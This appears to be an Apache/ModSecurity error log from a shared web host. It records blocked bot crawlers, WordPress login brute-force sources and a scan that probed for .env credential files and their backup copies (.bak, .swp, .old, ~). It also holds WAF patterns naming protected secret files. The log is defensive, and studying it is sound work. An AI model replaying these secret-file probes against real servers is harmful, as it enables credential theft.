[Tue May 26 17:54:40.754665 2026] [security2:error] [pid 937900:tid 938037] [client 85.208.96.208:26998] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/9/"] [unique_id "ahWRCE4hPNS8CpkGLtbqZAAAAIw"]
[Tue May 26 17:54:40.754866 2026] [security2:error] [pid 937900:tid 938037] [client 85.208.96.208:26998] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/9/"] [unique_id "ahWRCE4hPNS8CpkGLtbqZAAAAIw"]
[Tue May 26 17:54:41.694126 2026] [security2:error] [pid 937900:tid 938035] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRCU4hPNS8CpkGLtbqcQAAAIo"]
[Tue May 26 17:54:43.308976 2026] [security2:error] [pid 937900:tid 938037] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRCk4hPNS8CpkGLtbqnAAAAIw"]
[Tue May 26 17:54:44.806406 2026] [security2:error] [pid 937900:tid 938035] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRDE4hPNS8CpkGLtbqvQAAAIo"]
[Tue May 26 17:54:44.807724 2026] [security2:error] [pid 937900:tid 938027] [remote 5.42.158.148:42912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWRDE4hPNS8CpkGLtbqwQAAzH4"]
[Tue May 26 17:54:47.191966 2026] [security2:error] [pid 937900:tid 938098] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRDk4hPNS8CpkGLtbq_AAAAMk"]
[Tue May 26 17:54:47.847413 2026] [security2:error] [pid 937900:tid 938041] [client 91.169.4.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRD04hPNS8CpkGLtbrFQAAAJA"]
[Tue May 26 17:54:48.667213 2026] [security2:error] [pid 937900:tid 938130] [client 184.154.76.35:0] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWREE4hPNS8CpkGLtbrLgAAAOk"]
[Tue May 26 17:54:48.667241 2026] [security2:error] [pid 937900:tid 938130] [client 184.154.76.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWREE4hPNS8CpkGLtbrLgAAAOk"]
[Tue May 26 17:54:48.805164 2026] [security2:error] [pid 937900:tid 938141] [client 184.154.76.35:51366] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/th1s_1s_a_4o4.html"] [unique_id "ahWREE4hPNS8CpkGLtbrLAAAAN0"]
[Tue May 26 17:54:49.545354 2026] [security2:error] [pid 937900:tid 938115] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWREU4hPNS8CpkGLtbrPwAAANo"]
[Tue May 26 17:54:50.359070 2026] [security2:error] [pid 937900:tid 938052] [client 66.146.235.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWREk4hPNS8CpkGLtbrXgAAAJs"], referer: https://www.anujtradingco.com/
[Tue May 26 17:54:51.928813 2026] [security2:error] [pid 937900:tid 938090] [client 66.146.235.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWRE04hPNS8CpkGLtbrhAAAAME"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 17:54:52.161517 2026] [security2:error] [pid 937900:tid 938138] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRE04hPNS8CpkGLtbrfgAAAPE"]
[Tue May 26 17:54:54.809147 2026] [security2:error] [pid 937900:tid 938048] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRFk4hPNS8CpkGLtbrwQAAAJc"]
[Tue May 26 17:54:55.570407 2026] [security2:error] [pid 937900:tid 938125] [client 162.243.41.33:56132] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "staging.unsobered.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWRF04hPNS8CpkGLtbr3QAAAOQ"]
[Tue May 26 17:54:56.588873 2026] [security2:error] [pid 937900:tid 938098] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRGE4hPNS8CpkGLtbr7QAAAMk"]
[Tue May 26 17:54:59.314564 2026] [security2:error] [pid 937900:tid 937926] [remote 91.134.89.60:44682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWRG04hPNS8CpkGLtbsKgAA6Bk"]
[Tue May 26 17:54:59.633806 2026] [security2:error] [pid 937900:tid 938039] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRG04hPNS8CpkGLtbsMAAAAI4"]
[Tue May 26 17:55:00.591284 2026] [security2:error] [pid 937900:tid 938102] [client 146.174.189.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRHE4hPNS8CpkGLtbsSQAAAM0"]
[Tue May 26 17:55:00.641935 2026] [security2:error] [pid 937900:tid 938082] [client 185.251.19.120:37445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.19.251.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWRHE4hPNS8CpkGLtbsTgAAALk"]
[Tue May 26 17:55:01.465761 2026] [security2:error] [pid 937900:tid 938083] [client 66.146.235.19:26091] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWRHE4hPNS8CpkGLtbsUgAAALo"], referer: https://anujtradingco.com
[Tue May 26 17:55:01.973263 2026] [security2:error] [pid 937900:tid 938030] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRHU4hPNS8CpkGLtbsbAAAAIU"]
[Tue May 26 17:55:04.149896 2026] [security2:error] [pid 937900:tid 938099] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRH04hPNS8CpkGLtbsngAAAMo"]
[Tue May 26 17:55:06.667539 2026] [security2:error] [pid 937900:tid 938103] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRIk4hPNS8CpkGLtbsxwAAAM4"]
[Tue May 26 17:55:07.179161 2026] [security2:error] [pid 937900:tid 937914] [remote 51.89.129.52:48330] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "whitesun.in"] [uri "/robots.txt"] [unique_id "ahWRI04hPNS8CpkGLtbs8gAAsQ0"]
[Tue May 26 17:55:07.179345 2026] [security2:error] [pid 937900:tid 938074] [client 51.89.129.52:48330] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "whitesun.in"] [uri "/robots.txt"] [unique_id "ahWRI04hPNS8CpkGLtbs8gAAsQ0"]
[Tue May 26 17:55:08.680150 2026] [security2:error] [pid 937900:tid 937999] [remote 15.235.27.101:28414] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "whitesun.in"] [uri "/"] [unique_id "ahWRJE4hPNS8CpkGLtbtGwAA1mI"]
[Tue May 26 17:55:08.680368 2026] [security2:error] [pid 937900:tid 938111] [client 15.235.27.101:28414] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "whitesun.in"] [uri "/"] [unique_id "ahWRJE4hPNS8CpkGLtbtGwAA1mI"]
[Tue May 26 17:55:09.073729 2026] [security2:error] [pid 937900:tid 938034] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRJE4hPNS8CpkGLtbtGgAAAIk"]
[Tue May 26 17:55:10.045138 2026] [core:error] [pid 937900:tid 938127] [client 208.84.100.97:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:55:10.045177 2026] [core:error] [pid 937900:tid 938127] [client 208.84.100.97:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:55:11.227308 2026] [security2:error] [pid 937900:tid 938067] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRJk4hPNS8CpkGLtbtQQAAAKo"]
[Tue May 26 17:55:13.049682 2026] [security2:error] [pid 937900:tid 938135] [client 208.84.100.97:7106] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/app/.env"] [unique_id "ahWRKU4hPNS8CpkGLtbtcQAAAO4"]
[Tue May 26 17:55:13.142887 2026] [security2:error] [pid 937900:tid 938088] [client 208.84.100.97:7112] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/api/.env"] [unique_id "ahWRKU4hPNS8CpkGLtbtdwAAAL8"]
[Tue May 26 17:55:13.144069 2026] [security2:error] [pid 937900:tid 938064] [client 208.84.100.97:7128] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahWRKU4hPNS8CpkGLtbteAAAAKc"]
[Tue May 26 17:55:13.206206 2026] [security2:error] [pid 937900:tid 937950] [remote 167.172.25.98:49036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWRKU4hPNS8CpkGLtbtcAAA_zE"]
[Tue May 26 17:55:13.245668 2026] [security2:error] [pid 937900:tid 938057] [client 208.84.100.97:60910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahWRKU4hPNS8CpkGLtbtfgAAAKA"]
[Tue May 26 17:55:13.614756 2026] [security2:error] [pid 937900:tid 938114] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRKU4hPNS8CpkGLtbtewAAANk"]
[Tue May 26 17:55:13.693080 2026] [http2:info] [pid 946381:tid 946381] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:55:15.390979 2026] [security2:error] [pid 946381:tid 946568] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRKtiTu5WG4Dm5Wprx5gAAADk"]
[Tue May 26 17:55:15.666795 2026] [security2:error] [pid 946381:tid 946575] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRK9iTu5WG4Dm5Wprx7QAAAEA"]
[Tue May 26 17:55:16.049982 2026] [security2:error] [pid 946381:tid 946628] [client 208.84.100.97:7152] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.production.copy"] [unique_id "ahWRLNiTu5WG4Dm5WpryDAAAAHU"]
[Tue May 26 17:55:17.004318 2026] [security2:error] [pid 946381:tid 946629] [client 62.244.225.226:25525] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWRLNiTu5WG4Dm5WpryFQAAAHY"]
[Tue May 26 17:55:18.256098 2026] [security2:error] [pid 946381:tid 946599] [client 208.84.100.97:7398] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.swp"] [unique_id "ahWRLtiTu5WG4Dm5WpryQAAAAFg"]
[Tue May 26 17:55:18.257674 2026] [security2:error] [pid 946381:tid 946587] [client 208.84.100.97:7374] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.old"] [unique_id "ahWRLtiTu5WG4Dm5WpryQgAAAEw"]
[Tue May 26 17:55:18.258391 2026] [security2:error] [pid 946381:tid 946574] [client 208.84.100.97:7362] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.bak"] [unique_id "ahWRLtiTu5WG4Dm5WpryQwAAAD8"]
[Tue May 26 17:55:18.258352 2026] [security2:error] [pid 946381:tid 946616] [client 208.84.100.97:7444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.local.backup"] [unique_id "ahWRLtiTu5WG4Dm5WpryPwAAAGk"]
[Tue May 26 17:55:18.259715 2026] [security2:error] [pid 946381:tid 946575] [client 208.84.100.97:7414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.copy"] [unique_id "ahWRLtiTu5WG4Dm5WpryQQAAAEA"]
[Tue May 26 17:55:18.259766 2026] [security2:error] [pid 946381:tid 946593] [client 208.84.100.97:7430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.local.old"] [unique_id "ahWRLtiTu5WG4Dm5WpryPQAAAFI"]
[Tue May 26 17:55:18.261198 2026] [security2:error] [pid 946381:tid 946582] [client 208.84.100.97:7400] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.orig"] [unique_id "ahWRLtiTu5WG4Dm5WpryPgAAAEc"]
[Tue May 26 17:55:18.267612 2026] [security2:error] [pid 946381:tid 946550] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRLdiTu5WG4Dm5WpryLwAAACc"]
[Tue May 26 17:55:18.275115 2026] [security2:error] [pid 946381:tid 946600] [client 208.84.100.97:7468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.local~"] [unique_id "ahWRLtiTu5WG4Dm5WpryRwAAAFk"]
[Tue May 26 17:55:18.347373 2026] [security2:error] [pid 946381:tid 946589] [client 208.84.100.97:7152] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.production.bak"] [unique_id "ahWRLtiTu5WG4Dm5WpryTgAAAE4"]
[Tue May 26 17:55:18.352668 2026] [security2:error] [pid 946381:tid 946607] [client 208.84.100.97:7148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.local.copy"] [unique_id "ahWRLtiTu5WG4Dm5WpryUAAAAGA"]
[Tue May 26 17:55:18.543706 2026] [security2:error] [pid 946381:tid 946597] [client 208.84.100.97:7578] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.production.orig"] [unique_id "ahWRLtiTu5WG4Dm5WpryVwAAAFY"]
[Tue May 26 17:55:18.544879 2026] [security2:error] [pid 946381:tid 946618] [client 208.84.100.97:7598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env~"] [unique_id "ahWRLtiTu5WG4Dm5WpryVAAAAGs"]
[Tue May 26 17:55:18.546116 2026] [security2:error] [pid 946381:tid 946588] [client 208.84.100.97:7590] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webdisk.bookmyitem.com"] [uri "/___proxy_subdomain_webdisk/.env.local.swp"] [unique_id "ahWRLtiTu5WG4Dm5WpryVQAAAE0"]
